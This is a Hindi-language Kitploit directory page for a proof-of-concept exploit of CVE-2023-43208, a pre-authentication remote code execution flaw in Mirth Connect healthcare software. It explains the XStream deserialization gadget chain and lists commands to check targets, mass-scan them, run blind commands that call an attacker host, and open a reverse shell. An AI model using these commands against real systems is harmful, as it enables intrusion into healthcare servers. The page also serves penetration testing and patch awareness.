Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-43208 — CVE-2023-43208: Mirth Connect Pre-Auth RCE PoC | Kitploit
उपकरण/GitHubGitHub/kyakei/cve-2023-43208
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: Mirth Connect Pre-Auth RCE PoC

रिपॉजिटरी देखें
3116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-43208 — Mirth Connect प्री-प्रमाणन RCE

XStream डीसेरियलाइज़ेशन बाइपास के माध्यम से NextGen Healthcare Mirth Connect < 4.4.1 में प्री-प्रमाणित रिमोट कोड निष्पादन।

CVSS 9.8 (क्रिटिकल) — CVE-2023-37679 का पैच बायपास

अवलोकन

Mirth Connect, /api/users एंडपॉइंट पर XML पेलोड को डीसेरियलाइज़ करने के लिए Java XStream लाइब्रेरी का उपयोग बिना प्रमाणीकरण के करता है। मूल फिक्स (CVE-2023-37679) ने खतरनाक क्लासेस की एक डेनीलिस्ट पेश की थी, लेकिन Apache Commons Lang3 के EventBindingInvocationHandler को Commons Collections4 InvokerTransformer श्रृंखला के साथ जोड़कर इसे बायपास कर दिया गया।

Mirth Connect 4.4.1 में डेनीलिस्ट से अलाउलिस्ट पर स्विच करके इसे ठीक किया गया।

आवश्यकताएँ

root@kitploit:~
pip install requests

Python 3.10+ (match स्टेटमेंट का उपयोग करता है)।

उपयोग

टूल डाउनलोड करें

जाँचें कि टारगेट असुरक्षित है या नहीं

root@kitploit:~
python3 exploit.py check -t https://target:8443

कमांड निष्पादित करें (ब्लाइंड RCE — कोई आउटपुट नहीं)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

रिवर्स शेल खोलें

root@kitploit:~
# Terminal 1 (or let the script handle the listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# For better shell experience, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

एकाधिक टारगेट स्कैन करें

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

अटैक चेन

root@kitploit:~
POST /api/users  (no auth)
     │
     ▼
XStream deserializes XML payload
     │
     ▼
sorted-set triggers Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (bypasses denylist)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <command>)
           │
           ▼
      OS command execution as Mirth Connect service user

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

संदर्भ

  • NVD — CVE-2023-43208
  • Horizon3.ai — विश्लेषण
  • CISA KEV कैटलॉग